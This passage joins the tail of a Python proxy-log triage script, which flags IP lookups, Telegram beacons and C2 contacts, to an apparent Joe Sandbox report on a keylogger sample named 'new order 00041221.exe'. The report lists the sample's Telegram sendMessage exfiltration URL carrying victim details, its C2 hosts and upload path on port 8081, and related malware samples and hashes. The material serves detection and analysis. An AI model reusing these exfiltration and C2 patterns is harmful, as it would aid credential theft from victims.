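            findings.append((rec["client"], "recon", f"public IP / geolocation lookup to {rec['host']}"))
        elif beacon is not None:
            summary = ", ".join(f"{k}={v}" for k, v in beacon["fields"].items())
            findings.append((rec["client"], "exfil", f"Telegram sendMessage beacon: {summary}"))
        elif rec["host"] in C2_HOSTS or rec["port"] == C2_PORT:
            findings.append((rec["client"], "c2", f"{rec['method']} {rec['host']}:{rec['port']}{rec['path']}"))
    return findings


def suspicious_clients(findings):
    """Clients that did the IP/geo lookups and then beaconed or contacted C2.

    The sequence, not any single hit, is what distinguishes the keylogger
    from a user who merely visited an IP-check site."""
    seen = {}
    for client, category, _ in findings:
        seen.setdefault(client, set()).add(category)
    return sorted(c for c, cats in seen.items() if "recon" in cats and cats & {"exfil", "c2"})


if __name__ == "__main__":
    for client, category, detail in triage(SAMPLE_LOG):
        print(f"{client:<10} {category:<6} {detail}")
    print("suspicious:", suspicious_clients(triage(SAMPLE_LOG)))
```

Run as-is it prints one line per hit and then the correlated client list; the office.com line from the second client produces nothing. When applying this to real proxy data, replace SAMPLE_LOG with the exported lines and adjust LINE_RE to the export's field order; the decoder assumes the beacon text is still in the query string, which is how this sample sends it.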
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2027/07/2024%20/%2000:07:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org/xml/8.46.123.33 | false | URL Reputation: safe | unknown
http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.office.com/ | new order 00041221.exe, 00000003.00000002.3711414422.00000000030A5000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://api.telegram.org | new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://r11.o.lencr.org0# | new order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3710772677.0000000001337000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot | new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
https://www.office.com/lB | new order 00041221.exe, 00000003.00000002.3711414422.00000000030A0000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20a | new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
https://chrome.google.com/webstore?hl=en0 | new order 00041221.exe, 00000003.00000002.3711414422.0000000003065000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://checkip.dyndns.org | new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text= | new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://chrome.google.com/webstore?hl=en | new order 00041221.exe, 00000003.00000002.3711414422.0000000003074000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000003065000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.00000000030A5000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://varders.kozow.com:8081 | new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | 15%, Virustotal; Avira URL Cloud: safe | unknown
http://aborters.duckdns.org:8081 | new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | 12%, Virustotal; Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://51.38.247.67:8081/_send_.php?L | new order 00041221.exe, 00000003.00000002.3711414422.00000000030D0000.00000004.00000800.00020000.00000000.sdmp | false | 3%, Virustotal; Avira URL Cloud: safe | unknown
http://r11.i.lencr.org/0Q | new order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3710772677.0000000001337000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org/xml/8.46.123.33$ | new order 00041221.exe, 00000003.00000002.3711414422.0000000002F9F000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.office.com/0 | new order 00041221.exe, 00000003.00000002.3711414422.0000000003096000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://anotherarmy.dns.army:8081 | new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | 15%, Virustotal; Avira URL Cloud: malware | unknown
http://x1.c.lencr.org/0 | new order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3716273829.0000000006678000.00000004.00000020.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3710772677.0000000001337000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://x1.i.lencr.org/0 | new order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3716273829.0000000006678000.00000004.00000020.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3710772677.0000000001337000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://checkip.dyndns.org/q | new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://chrome.google.com/webstore?hl=enlB | new order 00041221.exe, 00000003.00000002.3711414422.000000000306F000.00000004.00000800.00020000.00000000.sdmp | false
                    • Avira URL Cloud: safe
                    unknown
                    http://mail.moonbrosurgical.comnew order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://reallyfreegeoip.orgnew order 00041221.exe, 00000003.00000002.3711414422.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002F9F000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namenew order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodednew order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://reallyfreegeoip.org/xml/new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
188.114.97.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true
203.124.44.4 | mail.moonbrosurgical.com | Pakistan | 7590 | COMSATSCommissiononScienceandTechnologyforPK | false
193.122.6.168 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1482843
Start date and time: 2024-07-26 09:02:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 30s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: new order 00041221.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/1@6/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 101
• Number of non-executed functions: 40
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
03:03:04 | API Interceptor | 10453392x Sleep call for process: new order 00041221.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
149.154.167.220 | 7NeoZ6OBn2.exe | Get hash | malicious | Unknown | Browse
 | 7NeoZ6OBn2.exe | Get hash | malicious | Unknown | Browse
 | file.exe | Get hash | malicious | Unknown | Browse
 | file.exe | Get hash | malicious | Unknown | Browse
 | file.exe | Get hash | malicious | Unknown | Browse
 | LisectAVT_2403002A_127.exe | Get hash | malicious | AgentTesla | Browse
 | LisectAVT_2403002A_74.exe | Get hash | malicious | AgentTesla | Browse
 | New Order.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse
 | LisectAVT_2403002B_4.exe | Get hash | malicious | AsyncRAT, Neshta, StormKitty, WorldWind Stealer | Browse
 | Payment_Advice.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse
188.114.97.3 | #U00d6DEME TAVS#U0130YES#U0130.xls | Get hash | malicious | Remcos | Browse | tny.wtf/4Gs
 | Notepad3_v6.23.203.2.exe | Get hash | malicious | Amadey, GO Backdoor | Browse | downloaddining2.com/h9fmdW6/index.php
 | Quotation.exe | Get hash | malicious | FormBook | Browse | www.bahisanaliz16.xyz/ty31/?nfuxZr=JoA2dMXfLBqFXt4x+LwNr+felGYfgJXJPNkjuKbt07zo6G2Rowrau43mkNbOTfffhSkjLsiciQ==&v6AxO=1bjHLvGh8ZYHMfZp
 | LisectAVT_2403002B_412.exe | Get hash | malicious | FormBook | Browse | www.whatareyoucraving.com/drbb/
 | AVISO DE PAGO.xls | Get hash | malicious | Unknown | Browse | tny.wtf/pqv2p
 | AVISO DE PAGO.xls | Get hash | malicious | Unknown | Browse | tny.wtf/pqv2p
 | AVISO DE PAGO.xls | Get hash | malicious | Unknown | Browse | tny.wtf/pqv2p
 | PO S0042328241130.xls | Get hash | malicious | Remcos | Browse | tny.wtf/vMCQY
 | LisectAVT_2403002B_89.exe | Get hash | malicious | CobaltStrike | Browse | cccc.yiuyiu.xyz/config.ini
 | irlsever.doc | Get hash | malicious | FormBook | Browse | www.ninunveiled.shop/y2xs/
203.124.44.4 | WT01151024637.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse
193.122.6.168 | New order.exe | Get hash | malicious | Snake Keylogger | Browse | checkip.dyndns.org/
 | Payment_Advice.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | checkip.dyndns.org/
 | Apixaban - August 2024.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | checkip.dyndns.org/
 | Payment Slip.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | checkip.dyndns.org/
 | SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | checkip.dyndns.org/
 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf | Get hash | malicious | Snake Keylogger | Browse | checkip.dyndns.org/
 | Confirmation transfer Copy AGS # 24-00379.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | checkip.dyndns.org/
 | Orden de Compra..exe | Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | checkip.dyndns.org/
 | Fekdjuvq.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | checkip.dyndns.org/
 | neworder.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | checkip.dyndns.org/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
reallyfreegeoip.org | New order.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.97.3
 | New Order.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | 188.114.96.3
 | Payment_Advice.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 188.114.97.3
 | LPO-9180155-PDF.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 188.114.97.3
 | Apixaban - August 2024.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 188.114.96.3
 | Payment Slip.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 188.114.97.3
 | Torpernes.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 188.114.96.3
 | Confirmation Order.js | Get hash | malicious | Snake Keylogger | Browse | 188.114.97.3
 | DSD876543456780000.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 188.114.97.3
 | Deye Union - PO # 23081377.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.97.3
checkip.dyndns.com | New order.exe | Get hash | malicious | Snake Keylogger | Browse | 193.122.6.168
 | New Order.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | 193.122.130.0
 | Payment_Advice.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 193.122.6.168
 | LPO-9180155-PDF.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 132.226.247.73
 | Apixaban - August 2024.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 193.122.6.168
 | Payment Slip.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 193.122.6.168
 | Torpernes.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 158.101.44.242
 | Confirmation Order.js | Get hash | malicious | Snake Keylogger | Browse | 132.226.247.73
 | DSD876543456780000.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 158.101.44.242
 | Confirmation transfer Note AGS # 22-00379.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 158.101.44.242
api.telegram.org | 7NeoZ6OBn2.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | 7NeoZ6OBn2.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | file.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | file.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | file.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | LisectAVT_2403002A_127.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
 | LisectAVT_2403002A_74.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
 | New Order.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
 | LisectAVT_2403002B_4.exe | Get hash | malicious | AsyncRAT, Neshta, StormKitty, WorldWind Stealer | Browse | 149.154.167.220
 | Payment_Advice.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
mail.moonbrosurgical.com | WT01151024637.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 203.124.44.4
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
ORACLE-BMC-31898US | New order.exe | Get hash | malicious | Snake Keylogger | Browse | 158.101.44.242
 | http://docusign.net | Get hash | malicious | Unknown | Browse | 192.29.14.118
 | New Order.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | 193.122.130.0
 | Payment_Advice.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 193.122.6.168
 | Apixaban - August 2024.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 193.122.6.168
 | Payment Slip.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 193.122.6.168
 | Torpernes.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 158.101.44.242
 | Lisect_AVT_24003_G1B_67.exe | Get hash | malicious | Unknown | Browse | 158.101.28.51
 | DSD876543456780000.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 158.101.44.242
 | Confirmation transfer Note AGS # 22-00379.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 158.101.44.242
TELEGRAMRU | 7NeoZ6OBn2.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | 7NeoZ6OBn2.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | fps-booster.exe | Get hash | malicious | StormKitty | Browse | 149.154.167.99
 | file.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | file.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | file.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | http://jolly-figolla-4c9551.netlify.app/ | Get hash | malicious | Unknown | Browse | 149.154.167.99
 | LisectAVT_2403002A_127.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
 | LisectAVT_2403002A_138.exe | Get hash | malicious | Vidar | Browse | 149.154.167.99
 | LisectAVT_2403002A_425.dll | Get hash | malicious | Unknown | Browse | 149.154.167.99
CLOUDFLARENETUS | JGKjBsQrMc.exe | Get hash | malicious | Amadey, Babadeda, RedLine, Stealc, Vidar | Browse | 172.64.41.3
 | zKXXNr7f2e.exe | Get hash | malicious | Babadeda | Browse | 162.159.61.3
 | N#U00b0025498563-.pdf | Get hash | malicious | Unknown | Browse | 172.64.41.3
 | #U00d6DEME TAVS#U0130YES#U0130.xls | Get hash | malicious | Remcos | Browse | 188.114.97.3
 | 6Vm1Ii4ASz.exe | Get hash | malicious | Babadeda | Browse | 172.64.41.3
 | ynhHNexysa.exe | Get hash | malicious | AgentTesla | Browse | 172.67.74.152
 | http://lotsa.pplanr.com | Get hash | malicious | Unknown | Browse | 104.21.44.162
 | 2FBexXRCHR.rtf | Get hash | malicious | AgentTesla | Browse | 172.67.74.152
 | QMe7JpPtde.exe | Get hash | malicious | Unknown | Browse | 104.26.2.16
 | http://leostop.com | Get hash | malicious | Unknown | Browse | 104.16.141.114
COMSATSCommissiononScienceandTechnologyforPK | WT01151024637.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 203.124.44.4
 | PWvekjrPit.elf | Get hash | malicious | Unknown | Browse | 203.124.39.102
 | SecuriteInfo.com.Win32.TrojanX-gen.29414.12459.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 203.124.44.180
 | Payment_Advice-BCS_ECS9522024012916420050_38_952.pdf.eml.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 203.124.44.180
 | SecuriteInfo.com.Win32.TrojanX-gen.29443.22875.exe | Get hash | malicious | AgentTesla | Browse | 203.124.44.180
 | SecuriteInfo.com.Win32.PWSX-gen.4826.5402.exe | Get hash | malicious | AgentTesla | Browse | 203.124.44.180
 | SecuriteInfo.com.MSIL.GenKryptik.FQQD.tr.9358.12928.exe | Get hash | malicious | AgentTesla | Browse | 203.124.44.180
 | SecuriteInfo.com.Win32.PWSX-gen.15477.26079.exe | Get hash | malicious | AgentTesla | Browse | 203.124.44.180
 | SecuriteInfo.com.Win32.RATX-gen.26533.9243.exe | Get hash | malicious | AgentTesla | Browse | 203.124.44.180
 | SecuriteInfo.com.Win32.PWSX-gen.29302.28377.exe | Get hash | malicious | AgentTesla | Browse | 203.124.44.180
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
54328bd36c14bd82ddaa0c04b25ed9ad | New Order.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | 188.114.97.3
 | LisectAVT_2403002B_361.exe | Get hash | malicious | Quasar | Browse | 188.114.97.3
 | SWIFT.exe | Get hash | malicious | Lokibot | Browse | 188.114.97.3
 | Payment_Advice.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 188.114.97.3
 | LPO-9180155-PDF.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 188.114.97.3
 | Apixaban - August 2024.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 188.114.97.3
 | Payment Slip.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 188.114.97.3
 | Torpernes.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 188.114.97.3
 | Confirmation Order.js | Get hash | malicious | Snake Keylogger | Browse | 188.114.97.3
 | Lisect_AVT_24003_G1B_21.exe | Get hash | malicious | Unknown | Browse | 188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e | ynhHNexysa.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
 | 7Y18r(191).exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | 7Y18r(169).exe | Get hash | malicious | CryptOne | Browse | 149.154.167.220
 | 7Y18r(191).exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | xptRc4P9NV.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | fps-booster.exe | Get hash | malicious | StormKitty | Browse | 149.154.167.220
 | https://metamaskwalletexetention.webflow.io/ | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | http://56edthdxfhbx.pages.dev/ | Get hash | malicious | TechSupportScam | Browse | 149.154.167.220
 | https://banco.estado-app.com | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | http://contact-office-kawai9lpoe9srsi9lpoe9srsi.narymar.com/ | Get hash | malicious | Unknown | Browse | 149.154.167.220
                                          No context
Process: C:\Users\user\Desktop\new order 00041221.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Reputation: high, very likely benign file
